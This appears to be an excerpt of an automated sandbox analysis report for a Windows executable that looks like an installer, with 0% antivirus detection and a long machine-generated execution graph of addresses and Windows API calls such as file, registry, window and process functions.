                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 0%, ReversingLabs
                                                      Has exited:false

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:12.8%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:20.6%
                                                        Total number of Nodes:1523
                                                        Total number of Limit Nodes:37
                                                        execution_graph 4165 402fc0 4166 401446 18 API calls 4165->4166 4167 402fc7 4166->4167 4168 403017 4167->4168 4169 40300a 4167->4169 4172 401a13 4167->4172 4170 406805 18 API calls 4168->4170 4171 401446 18 API calls 4169->4171 4170->4172 4171->4172 4173 4023c1 4174 40145c 18 API calls 4173->4174 4175 4023c8 4174->4175 4178 40726a 4175->4178 4181 406ed2 CreateFileW 4178->4181 4182 406f04 4181->4182 4183 406f1e ReadFile 4181->4183 4184 4062a3 11 API calls 4182->4184 4185 4023d6 4183->4185 4188 406f84 4183->4188 4184->4185 4186 4071e3 CloseHandle 4186->4185 4187 406f9b ReadFile lstrcpynA lstrcmpA 4187->4188 4189 406fe2 SetFilePointer ReadFile 4187->4189 4188->4185 4188->4186 4188->4187 4192 406fdd 4188->4192 4189->4186 4190 4070a8 ReadFile 4189->4190 4191 407138 4190->4191 4191->4190 4191->4192 4193 40715f SetFilePointer GlobalAlloc ReadFile 4191->4193 4192->4186 4194 4071a3 4193->4194 4195 4071bf lstrcpynW GlobalFree 4193->4195 4194->4194 4194->4195 4195->4186 4196 401cc3 4197 40145c 18 API calls 4196->4197 4198 401cca lstrlenW 4197->4198 4199 4030dc 4198->4199 4200 4030e3 4199->4200 4202 405f51 wsprintfW 4199->4202 4202->4200 4217 401c46 4218 40145c 18 API calls 4217->4218 4219 401c4c 4218->4219 4220 4062a3 11 API calls 4219->4220 4221 401c59 4220->4221 4222 406c9b 81 API calls 4221->4222 4223 401c64 4222->4223 4224 403049 4225 401446 18 API calls 4224->4225 4228 403050 4225->4228 4226 406805 18 API calls 4227 401a13 4226->4227 4228->4226 4228->4227 4229 40204a 4230 401446 18 API calls 4229->4230 4231 402051 IsWindow 4230->4231 4232 4018d3 4231->4232 4233 40324c 4234 403277 4233->4234 4235 40325e SetTimer 4233->4235 4236 4032cc 4234->4236 4237 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4234->4237 4235->4234 4237->4236 4238 4048cc 4239 4048f1 4238->4239 4240 4048da 4238->4240 4242 4048ff IsWindowVisible 4239->4242 4246 404916 4239->4246 4241 4048e0 4240->4241 4256 40495a 4240->4256 4243 403daf SendMessageW 4241->4243 4245 40490c 4242->4245 4242->4256 4247 4048ea 4243->4247 4244 404960 CallWindowProcW 4244->4247 4257 40484e SendMessageW 4245->4257 4246->4244 4262 406009 lstrcpynW 4246->4262 4250 404945 4263 405f51 wsprintfW 4250->4263 4252 40494c 4253 40141d 80 API calls 4252->4253 4254 404953 4253->4254 4264 406009 lstrcpynW 4254->4264 4256->4244 4258 404871 GetMessagePos ScreenToClient SendMessageW 4257->4258 4259 4048ab SendMessageW 4257->4259 4260 4048a3 4258->4260 4261 4048a8 4258->4261 4259->4260 4260->4246 4261->4259 4262->4250 4263->4252 4264->4256 4265 4022cc 4266 40145c 18 API calls 4265->4266 4267 4022d3 4266->4267 4268 4062d5 2 API calls 4267->4268 4269 4022d9 4268->4269 4270 4022e8 4269->4270 4274 405f51 wsprintfW 4269->4274 4273 4030e3 4270->4273 4275 405f51 wsprintfW 4270->4275 4274->4270 4275->4273 4276 4050cd 4277 405295 4276->4277 4278 4050ee GetDlgItem GetDlgItem GetDlgItem 4276->4278 4279 4052c6 4277->4279 4280 40529e GetDlgItem CreateThread CloseHandle 4277->4280 4325 403d98 SendMessageW 4278->4325 4282 4052f4 4279->4282 4284 4052e0 ShowWindow ShowWindow 4279->4284 4285 405316 4279->4285 4280->4279 4286 405352 4282->4286 4288 405305 4282->4288 4289 40532b ShowWindow 4282->4289 4283 405162 4296 406805 18 API calls 4283->4296 4330 403d98 SendMessageW 4284->4330 4334 403dca 4285->4334 4286->4285 4291 40535d SendMessageW 4286->4291 4331 403d18 4288->4331 4294 40534b 4289->4294 4295 40533d 4289->4295 4293 40528e 4291->4293 4298 405376 CreatePopupMenu 4291->4298 4297 403d18 SendMessageW 4294->4297 4299 404f72 25 API calls 4295->4299 4300 405181 4296->4300 4297->4286 4301 406805 18 API calls 4298->4301 4299->4294 4302 4062a3 11 API calls 4300->4302 4304 405386 AppendMenuW 4301->4304 4303 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4302->4303 4305 4051f3 4303->4305 4306 4051d7 SendMessageW SendMessageW 4303->4306 4307 405399 GetWindowRect 4304->4307 4308 4053ac 4304->4308 4309 405206 4305->4309 4310 4051f8 SendMessageW 4305->4310 4306->4305 4311 4053b3 TrackPopupMenu 4307->4311 4308->4311 4326 403d3f 4309->4326 4310->4309 4311->4293 4313 4053d1 4311->4313 4315 4053ed SendMessageW 4313->4315 4314 405216 4316 405253 GetDlgItem SendMessageW 4314->4316 4317 40521f ShowWindow 4314->4317 4315->4315 4318 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4315->4318 4316->4293 4321 405276 SendMessageW SendMessageW 4316->4321 4319 405242 4317->4319 4320 405235 ShowWindow 4317->4320 4322 40542f SendMessageW 4318->4322 4329 403d98 SendMessageW 4319->4329 4320->4319 4321->4293 4322->4322 4323 40545a GlobalUnlock SetClipboardData CloseClipboard 4322->4323 4323->4293 4325->4283 4327 406805 18 API calls 4326->4327 4328 403d4a SetDlgItemTextW 4327->4328 4328->4314 4329->4316 4330->4282 4332 403d25 SendMessageW 4331->4332 4333 403d1f 4331->4333 4332->4285 4333->4332 4335 403ddf GetWindowLongW 4334->4335 4345 403e68 4334->4345 4336 403df0 4335->4336 4335->4345 4337 403e02 4336->4337 4338 403dff GetSysColor 4336->4338 4339 403e12 SetBkMode 4337->4339 4340 403e08 SetTextColor 4337->4340 4338->4337 4341 403e30 4339->4341 4342 403e2a GetSysColor 4339->4342 4340->4339 4343 403e41 4341->4343 4344 403e37 SetBkColor 4341->4344 4342->4341 4343->4345 4346 403e54 DeleteObject 4343->4346 4347 403e5b CreateBrushIndirect 4343->4347 4344->4343 4345->4293 4346->4347 4347->4345 4348 4030cf 4349 40145c 18 API calls 4348->4349 4350 4030d6 4349->4350 4352 4030dc 4350->4352 4355 4063ac GlobalAlloc lstrlenW 4350->4355 4353 4030e3 4352->4353 4382 405f51 wsprintfW 4352->4382 4356 4063e2 4355->4356 4357 406434 4355->4357 4358 40640f GetVersionExW 4356->4358 4383 40602b CharUpperW 4356->4383 4357->4352 4358->4357 4359 40643e 4358->4359 4360 406464 LoadLibraryA 4359->4360 4361 40644d 4359->4361 4360->4357 4364 406482 GetProcAddress GetProcAddress GetProcAddress 4360->4364 4361->4357 4363 406585 GlobalFree 4361->4363 4365 40659b LoadLibraryA 4363->4365 4366 4066dd FreeLibrary 4363->4366 4369 4064aa 4364->4369 4372 4065f5 4364->4372 4365->4357 4368 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4365->4368 4366->4357 4367 406651 FreeLibrary 4376 40662a 4367->4376 4368->4372 4370 4064ce FreeLibrary GlobalFree 4369->4370 4369->4372 4378 4064ea 4369->4378 4370->4357 4371 4066ea 4374 4066ef CloseHandle FreeLibrary 4371->4374 4372->4367 4372->4376 4373 4064fc lstrcpyW OpenProcess 4375 40654f CloseHandle CharUpperW lstrcmpW 4373->4375 4373->4378 4377 406704 CloseHandle 4374->4377 4375->4372 4375->4378 4376->4371 4379 406685 lstrcmpW 4376->4379 4380 4066b6 CloseHandle 4376->4380 4381 4066d4 CloseHandle 4376->4381 4377->4374 4378->4363 4378->4373 4378->4375 4379->4376 4379->4377 4380->4376 4381->4366 4382->4353 4383->4356 4384 407752 4388 407344 4384->4388 4385 407c6d 4386 4073c2 GlobalFree 4387 4073cb GlobalAlloc 4386->4387 4387->4385 4387->4388 4388->4385 4388->4386 4388->4387 4388->4388 4389 407443 GlobalAlloc 4388->4389 4390 40743a GlobalFree 4388->4390 4389->4385 4389->4388 4390->4389 4391 401dd3 4392 401446 18 API calls 4391->4392 4393 401dda 4392->4393 4394 401446 18 API calls 4393->4394 4395 4018d3 4394->4395 4403 402e55 4404 40145c 18 API calls 4403->4404 4405 402e63 4404->4405 4406 402e79 4405->4406 4407 40145c 18 API calls 4405->4407 4408 405e30 2 API calls 4406->4408 4407->4406 4409 402e7f 4408->4409 4433 405e50 GetFileAttributesW CreateFileW 4409->4433 4411 402e8c 4412 402f35 4411->4412 4413 402e98 GlobalAlloc 4411->4413 4416 4062a3 11 API calls 4412->4416 4414 402eb1 4413->4414 4415 402f2c CloseHandle 4413->4415 4434 403368 SetFilePointer 4414->4434 4415->4412 4418 402f45 4416->4418 4420 402f50 DeleteFileW 4418->4420 4421 402f63 4418->4421 4419 402eb7 4423 403336 ReadFile 4419->4423 4420->4421 4435 401435 4421->4435 4424 402ec0 GlobalAlloc 4423->4424 4425 402ed0 4424->4425 4426 402f04 WriteFile GlobalFree 4424->4426 4427 40337f 37 API calls 4425->4427 4428 40337f 37 API calls 4426->4428 4432 402edd 4427->4432 4429 402f29 4428->4429 4429->4415 4431 402efb GlobalFree 4431->4426 4432->4431 4433->4411 4434->4419 4436 404f72 25 API calls 4435->4436 4437 401443 4436->4437 4438 401cd5 4439 401446 18 API calls 4438->4439 4440 401cdd 4439->4440 4441 401446 18 API calls 4440->4441 4442 401ce8 4441->4442 4443 40145c 18 API calls 4442->4443 4444 401cf1 4443->4444 4445 401d07 lstrlenW 4444->4445 4446 401d43 4444->4446 4447 401d11 4445->4447 4447->4446 4451 406009 lstrcpynW 4447->4451 4449 401d2c 4449->4446 4450 401d39 lstrlenW 4449->4450 4450->4446 4451->4449 4452 403cd6 4453 403ce1 4452->4453 4454 403ce5 4453->4454 4455 403ce8 GlobalAlloc 4453->4455 4455->4454 4456 402cd7 4457 401446 18 API calls 4456->4457 4460 402c64 4457->4460 4458 402d99 4459 402d17 ReadFile 4459->4460 4460->4456 4460->4458 4460->4459 4461 402dd8 4462 402ddf 4461->4462 4463 4030e3 4461->4463 4464 402de5 FindClose 4462->4464 4464->4463 4465 401d5c 4466 40145c 18 API calls 4465->4466 4467 401d63 4466->4467 4468 40145c 18 API calls 4467->4468 4469 401d6c 4468->4469 4470 401d73 lstrcmpiW 4469->4470 4471 401d86 lstrcmpW 4469->4471 4472 401d79 4470->4472 4471->4472 4473 401c99 4471->4473 4472->4471 4472->4473 4103 407c5f 4104 407344 4103->4104 4105 4073c2 GlobalFree 4104->4105 4106 4073cb GlobalAlloc 4104->4106 4107 407c6d 4104->4107 4108 407443 GlobalAlloc 4104->4108 4109 40743a GlobalFree 4104->4109 4105->4106 4106->4104 4106->4107 4108->4104 4108->4107 4109->4108 4474 404363 4475 404373 4474->4475 4476 40439c 4474->4476 4478 403d3f 19 API calls 4475->4478 4477 403dca 8 API calls 4476->4477 4479 4043a8 4477->4479 4480 404380 SetDlgItemTextW 4478->4480 4480->4476 4481 4027e3 4482 4027e9 4481->4482 4483 4027f2 4482->4483 4484 402836 4482->4484 4497 401553 4483->4497 4485 40145c 18 API calls 4484->4485 4487 40283d 4485->4487 4489 4062a3 11 API calls 4487->4489 4488 4027f9 4490 40145c 18 API calls 4488->4490 4495 401a13 4488->4495 4491 40284d 4489->4491 4492 40280a RegDeleteValueW 4490->4492 4501 40149d RegOpenKeyExW 4491->4501 4493 4062a3 11 API calls 4492->4493 4496 40282a RegCloseKey 4493->4496 4496->4495 4498 401563 4497->4498 4499 40145c 18 API calls 4498->4499 4500 401589 RegOpenKeyExW 4499->4500 4500->4488 4507 401515 4501->4507 4509 4014c9 4501->4509 4502 4014ef RegEnumKeyW 4503 401501 RegCloseKey 4502->4503 4502->4509 4504 4062fc 3 API calls 4503->4504 4506 401511 4504->4506 4505 401526 RegCloseKey 4505->4507 4506->4507 4510 401541 RegDeleteKeyW 4506->4510 4507->4495 4508 40149d 3 API calls 4508->4509 4509->4502 4509->4503 4509->4505 4509->4508 4510->4507 4511 403f64 4512 403f90 4511->4512 4513 403f74 4511->4513 4515 403fc3 4512->4515 4516 403f96 SHGetPathFromIDListW 4512->4516 4522 405c84 GetDlgItemTextW 4513->4522 4518 403fad SendMessageW 4516->4518 4519 403fa6 4516->4519 4517 403f81 SendMessageW 4517->4512 4518->4515 4520 40141d 80 API calls 4519->4520 4520->4518 4522->4517 4523 402ae4 4524 402aeb 4523->4524 4525 4030e3 4523->4525 4526 402af2 CloseHandle 4524->4526 4526->4525 4527 402065 4528 401446 18 API calls 4527->4528 4529 40206d 4528->4529 4530 401446 18 API calls 4529->4530 4531 402076 GetDlgItem 4530->4531 4532 4030dc 4531->4532 4533 4030e3 4532->4533 4535 405f51 wsprintfW 4532->4535 4535->4533 4536 402665 4537 40145c 18 API calls 4536->4537 4538 40266b 4537->4538 4539 40145c 18 API calls 4538->4539 4540 402674 4539->4540 4541 40145c 18 API calls 4540->4541 4542 40267d 4541->4542 4543 4062a3 11 API calls 4542->4543 4544 40268c 4543->4544 4545 4062d5 2 API calls 4544->4545 4546 402695 4545->4546 4547 4026a6 lstrlenW lstrlenW 4546->4547 4548 404f72 25 API calls 4546->4548 4551 4030e3 4546->4551 4549 404f72 25 API calls 4547->4549 4548->4546 4550 4026e8 SHFileOperationW 4549->4550 4550->4546 4550->4551 4559 401c69 4560 40145c 18 API calls 4559->4560 4561 401c70 4560->4561 4562 4062a3 11 API calls 4561->4562 4563 401c80 4562->4563 4564 405ca0 MessageBoxIndirectW 4563->4564 4565 401a13 4564->4565 4573 402f6e 4574 402f72 4573->4574 4575 402fae 4573->4575 4576 4062a3 11 API calls 4574->4576 4577 40145c 18 API calls 4575->4577 4578 402f7d 4576->4578 4583 402f9d 4577->4583 4579 4062a3 11 API calls 4578->4579 4580 402f90 4579->4580 4581 402fa2 4580->4581 4582 402f98 4580->4582 4585 4060e7 9 API calls 4581->4585 4584 403e74 5 API calls 4582->4584 4584->4583 4585->4583 4586 4023f0 4587 402403 4586->4587 4588 4024da 4586->4588 4589 40145c 18 API calls 4587->4589 4590 404f72 25 API calls 4588->4590 4591 40240a 4589->4591 4596 4024f1 4590->4596 4592 40145c 18 API calls 4591->4592 4593 402413 4592->4593 4594 402429 LoadLibraryExW 4593->4594 4595 40241b GetModuleHandleW 4593->4595 4597 40243e 4594->4597 4598 4024ce 4594->4598 4595->4594 4595->4597 4610 406365 GlobalAlloc WideCharToMultiByte 4597->4610 4599 404f72 25 API calls 4598->4599 4599->4588 4601 402449 4602 40248c 4601->4602 4603 40244f 4601->4603 4604 404f72 25 API calls 4602->4604 4606 401435 25 API calls 4603->4606 4608 40245f 4603->4608 4605 402496 4604->4605 4607 4062a3 11 API calls 4605->4607 4606->4608 4607->4608 4608->4596 4609 4024c0 FreeLibrary 4608->4609 4609->4596 4611 406390 GetProcAddress 4610->4611 4612 40639d GlobalFree 4610->4612 4611->4612 4612->4601 4613 402df3 4614 402dfa 4613->4614 4616 4019ec 4613->4616 4615 402e07 FindNextFileW 4614->4615 4615->4616 4617 402e16 4615->4617 4619 406009 lstrcpynW 4617->4619 4619->4616 4620 402175 4621 401446 18 API calls 4620->4621 4622 40217c 4621->4622 4623 401446 18 API calls 4622->4623 4624 402186 4623->4624 4625 4062a3 11 API calls 4624->4625 4629 402197 4624->4629 4625->4629 4626 4021aa EnableWindow 4628 4030e3 4626->4628 4627 40219f ShowWindow 4627->4628 4629->4626 4629->4627 4637 404077 4638 404081 4637->4638 4639 404084 lstrcpynW lstrlenW 4637->4639 4638->4639 4640 405479 4641 405491 4640->4641 4642 4055cd 4640->4642 4641->4642 4643 40549d 4641->4643 4644 40561e 4642->4644 4645 4055de GetDlgItem GetDlgItem 4642->4645 4646 4054a8 SetWindowPos 4643->4646 4647 4054bb 4643->4647 4649 405678 4644->4649 4657 40139d 80 API calls 4644->4657 4648 403d3f 19 API calls 4645->4648 4646->4647 4651 4054c0 ShowWindow 4647->4651 4652 4054d8 4647->4652 4653 405608 SetClassLongW 4648->4653 4650 403daf SendMessageW 4649->4650 4670 4055c8 4649->4670 4679 40568a 4650->4679 4651->4652 4654 4054e0 DestroyWindow 4652->4654 4655 4054fa 4652->4655 4656 40141d 80 API calls 4653->4656 4707 4058dc 4654->4707 4658 405510 4655->4658 4659 4054ff SetWindowLongW 4655->4659 4656->4644 4660 405650 4657->4660 4663 405587 4658->4663 4664 40551c GetDlgItem 4658->4664 4659->4670 4660->4649 4665 405654 SendMessageW 4660->4665 4661 40141d 80 API calls 4661->4679 4662 4058de DestroyWindow EndDialog 4662->4707 4666 403dca 8 API calls 4663->4666 4668 40554c 4664->4668 4669 40552f SendMessageW IsWindowEnabled 4664->4669 4665->4670 4666->4670 4667 40590d ShowWindow 4667->4670 4672 405559 4668->4672 4673 4055a0 SendMessageW 4668->4673 4674 40556c 4668->4674 4682 405551 4668->4682 4669->4668 4669->4670 4671 406805 18 API calls 4671->4679 4672->4673 4672->4682 4673->4663 4677 405574 4674->4677 4678 405589 4674->4678 4675 403d18 SendMessageW 4675->4663 4676 403d3f 19 API calls 4676->4679 4680 40141d 80 API calls 4677->4680 4681 40141d 80 API calls 4678->4681 4679->4661 4679->4662 4679->4670 4679->4671 4679->4676 4683 403d3f 19 API calls 4679->4683 4698 40581e DestroyWindow 4679->4698 4680->4682 4681->4682 4682->4663 4682->4675 4684 405705 GetDlgItem 4683->4684 4685 405723 ShowWindow EnableWindow 4684->4685 4686 40571a 4684->4686 4708 403d85 EnableWindow 4685->4708 4686->4685 4688 40574d EnableWindow 4691 405761 4688->4691 4689 405766 GetSystemMenu EnableMenuItem SendMessageW 4690 405796 SendMessageW 4689->4690 4689->4691 4690->4691 4691->4689 4709 403d98 SendMessageW 4691->4709 4710 406009 lstrcpynW 4691->4710 4694 4057c4 lstrlenW 4695 406805 18 API calls 4694->4695 4696 4057da SetWindowTextW 4695->4696 4697 40139d 80 API calls 4696->4697 4697->4679 4699 405838 CreateDialogParamW 4698->4699 4698->4707 4700 40586b 4699->4700 4699->4707 4701 403d3f 19 API calls 4700->4701 4702 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4701->4702 4703 40139d 80 API calls 4702->4703 4704 4058bc 4703->4704 4704->4670 4705 4058c4 ShowWindow 4704->4705 4706 403daf SendMessageW 4705->4706 4706->4707 4707->4667 4707->4670 4708->4688 4709->4691 4710->4694 4711 4020f9 GetDC GetDeviceCaps 4712 401446 18 API calls 4711->4712 4713 402116 MulDiv 4712->4713 4714 401446 18 API calls 4713->4714 4715 40212c 4714->4715 4716 406805 18 API calls 4715->4716 4717 402165 CreateFontIndirectW 4716->4717 4718 4030dc 4717->4718 4719 4030e3 4718->4719 4721 405f51 wsprintfW 4718->4721 4721->4719 4722 4024fb 4723 40145c 18 API calls 4722->4723 4724 402502 4723->4724 4725 40145c 18 API calls 4724->4725 4726 40250c 4725->4726 4727 40145c 18 API calls 4726->4727 4728 402515 4727->4728 4729 40145c 18 API calls 4728->4729 4730 40251f 4729->4730 4731 40145c 18 API calls 4730->4731 4732 402529 4731->4732 4733 40253d 4732->4733 4734 40145c 18 API calls 4732->4734 4735 4062a3 11 API calls 4733->4735 4734->4733 4736 40256a CoCreateInstance 4735->4736 4737 40258c 4736->4737 4738 40497c GetDlgItem GetDlgItem 4739 4049d2 7 API calls 4738->4739 4744 404bea 4738->4744 4740 404a76 DeleteObject 4739->4740 4741 404a6a SendMessageW 4739->4741 4742 404a81 4740->4742 4741->4740 4745 404ab8 4742->4745 4747 406805 18 API calls 4742->4747 4743 404ccf 4746 404d74 4743->4746 4751 404bdd 4743->4751 4756 404d1e SendMessageW 4743->4756 4744->4743 4754 40484e 5 API calls 4744->4754 4767 404c5a 4744->4767 4750 403d3f 19 API calls 4745->4750 4748 404d89 4746->4748 4749 404d7d SendMessageW 4746->4749 4753 404a9a SendMessageW SendMessageW 4747->4753 4758 404da2 4748->4758 4759 404d9b ImageList_Destroy 4748->4759 4769 404db2 4748->4769 4749->4748 4755 404acc 4750->4755 4757 403dca 8 API calls 4751->4757 4752 404cc1 SendMessageW 4752->4743 4753->4742 4754->4767 4760 403d3f 19 API calls 4755->4760 4756->4751 4762 404d33 SendMessageW 4756->4762 4763 404f6b 4757->4763 4764 404dab GlobalFree 4758->4764 4758->4769 4759->4758 4765 404add 4760->4765 4761 404f1c 4761->4751 4770 404f31 ShowWindow GetDlgItem ShowWindow 4761->4770 4766 404d46 4762->4766 4764->4769 4768 404baa GetWindowLongW SetWindowLongW 4765->4768 4777 404ba4 4765->4777 4780 404b39 SendMessageW 4765->4780 4781 404b67 SendMessageW 4765->4781 4782 404b7b SendMessageW 4765->4782 4776 404d57 SendMessageW 4766->4776 4767->4743 4767->4752 4771 404bc4 4768->4771 4769->4761 4772 404de4 4769->4772 4775 40141d 80 API calls 4769->4775 4770->4751 4773 404be2 4771->4773 4774 404bca ShowWindow 4771->4774 4785 404e12 SendMessageW 4772->4785 4788 404e28 4772->4788 4790 403d98 SendMessageW 4773->4790 4789 403d98 SendMessageW 4774->4789 4775->4772 4776->4746 4777->4768 4777->4771 4780->4765 4781->4765 4782->4765 4783 404ef3 InvalidateRect 4783->4761 4784 404f09 4783->4784 4791 4043ad 4784->4791 4785->4788 4787 404ea1 SendMessageW SendMessageW 4787->4788 4788->4783 4788->4787 4789->4751 4790->4744 4792 4043cd 4791->4792 4793 406805 18 API calls 4792->4793 4794 40440d 4793->4794 4795 406805 18 API calls 4794->4795 4796 404418 4795->4796 4797 406805 18 API calls 4796->4797 4798 404428 lstrlenW wsprintfW SetDlgItemTextW 4797->4798 4798->4761 4799 4026fc 4800 401ee4 4799->4800 4802 402708 4799->4802 4800->4799 4801 406805 18 API calls 4800->4801 4801->4800 4803 4019fd 4804 40145c 18 API calls 4803->4804 4805 401a04 4804->4805 4806 405e7f 2 API calls 4805->4806 4807 401a0b 4806->4807 4808 4022fd 4809 40145c 18 API calls 4808->4809 4810 402304 GetFileVersionInfoSizeW 4809->4810 4811 40232b GlobalAlloc 4810->4811 4815 4030e3 4810->4815 4812 40233f GetFileVersionInfoW 4811->4812 4811->4815 4813 402350 VerQueryValueW 4812->4813 4814 402381 GlobalFree 4812->4814 4813->4814 4817 402369 4813->4817 4814->4815 4821 405f51 wsprintfW 4817->4821 4819 402375 4822 405f51 wsprintfW 4819->4822 4821->4819 4822->4814 4823 402afd 4824 40145c 18 API calls 4823->4824 4825 402b04 4824->4825 4830 405e50 GetFileAttributesW CreateFileW 4825->4830 4827 402b10 4828 4030e3 4827->4828 4831 405f51 wsprintfW 4827->4831 4830->4827 4831->4828 4832 4029ff 4833 401553 19 API calls 4832->4833 4834 402a09 4833->4834 4835 40145c 18 API calls 4834->4835 4836 402a12 4835->4836 4837 402a1f RegQueryValueExW 4836->4837 4839 401a13 4836->4839 4838 402a3f 4837->4838 4842 402a45 4837->4842 4838->4842 4843 405f51 wsprintfW 4838->4843 4841 4029e4 RegCloseKey 4841->4839 4842->4839 4842->4841 4843->4842 4844 401000 4845 401037 BeginPaint GetClientRect 4844->4845 4846 40100c DefWindowProcW 4844->4846 4848 4010fc 4845->4848 4849 401182 4846->4849 4850 401073 CreateBrushIndirect FillRect DeleteObject 4848->4850 4851 401105 4848->4851 4850->4848 4852 401170 EndPaint 4851->4852 4853 40110b CreateFontIndirectW 4851->4853 4852->4849 4853->4852 4854 40111b 6 API calls 4853->4854 4854->4852 4855 401f80 4856 401446 18 API calls 4855->4856 4857 401f88 4856->4857 4858 401446 18 API calls 4857->4858 4859 401f93 4858->4859 4860 401fa3 4859->4860 4861 40145c 18 API calls 4859->4861 4862 401fb3 4860->4862 4863 40145c 18 API calls 4860->4863 4861->4860 4864 402006 4862->4864 4865 401fbc 4862->4865 4863->4862 4867 40145c 18 API calls 4864->4867 4866 401446 18 API calls 4865->4866 4869 401fc4 4866->4869 4868 40200d 4867->4868 4870 40145c 18 API calls 4868->4870 4871 401446 18 API calls 4869->4871 4872 402016 FindWindowExW 4870->4872 4873 401fce 4871->4873 4877 402036 4872->4877 4874 401ff6 SendMessageW 4873->4874 4875 401fd8 SendMessageTimeoutW 4873->4875 4874->4877 4875->4877 4876 4030e3 4877->4876 4879 405f51 wsprintfW 4877->4879 4879->4876 4880 402880 4881 402884 4880->4881 4882 40145c 18 API calls 4881->4882 4883 4028a7 4882->4883 4884 40145c 18 API calls 4883->4884 4885 4028b1 4884->4885 4886 4028ba RegCreateKeyExW 4885->4886 4887 4028e8 4886->4887 4894 4029ef 4886->4894 4888 402934 4887->4888 4889 40145c 18 API calls 4887->4889 4890 402963 4888->4890 4893 401446 18 API calls 4888->4893 4892 4028fc lstrlenW 4889->4892 4891 4029ae RegSetValueExW 4890->4891 4895 40337f 37 API calls 4890->4895 4898 4029c6 RegCloseKey 4891->4898 4899 4029cb 4891->4899 4896 402918 4892->4896 4897 40292a 4892->4897 4900 402947 4893->4900 4901 40297b 4895->4901 4902 4062a3 11 API calls 4896->4902 4903 4062a3 11 API calls 4897->4903 4898->4894 4904 4062a3 11 API calls 4899->4904 4905 4062a3 11 API calls 4900->4905 4911 406224 4901->4911 4907 402922 4902->4907 4903->4888 4904->4898 4905->4890 4907->4891 4910 4062a3 11 API calls 4910->4907 4912 406247 4911->4912 4913 40628a 4912->4913 4914 40625c wsprintfW 4912->4914 4915 402991 4913->4915 4916 406293 lstrcatW 4913->4916 4914->4913 4914->4914 4915->4910 4916->4915 4917 402082 4918 401446 18 API calls 4917->4918 4919 402093 SetWindowLongW 4918->4919 4920 4030e3 4919->4920 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3640 403859 3483->3640 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3491 403ae1 3647 405ca0 3491->3647 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3651 406009 lstrcpynW 3493->3651 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3652 40677e 3503->3652 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3682 406009 lstrcpynW 3509->3682 3681 406009 lstrcpynW 3510->3681 3515 403bef 3511->3515 3514 403b44 3683 406009 lstrcpynW 3514->3683 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3667 406009 lstrcpynW 3519->3667 3711 40141d 3520->3711 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3684 406805 3529->3684 3703 406c68 3529->3703 3708 405c3f CreateProcessW 3529->3708 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3714 406038 3546->3714 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3723 406722 lstrlenW CharPrevW 3549->3723 3730 405e50 GetFileAttributesW CreateFileW 3554->3730 3556 4035c7 3577 4035d7 3556->3577 3731 406009 lstrcpynW 3556->3731 3558 4035ed 3732 406751 lstrlenW 3558->3732 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3739 4032d2 3563->3739 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3773 403368 SetFilePointer 3565->3773 3750 403368 SetFilePointer 3567->3750 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3751 40337f 3571->3751 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3737 403336 ReadFile 3576->3737 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3806 405f51 wsprintfW 3585->3806 3807 405ed3 RegOpenKeyExW 3586->3807 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3797 403e95 3592->3797 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 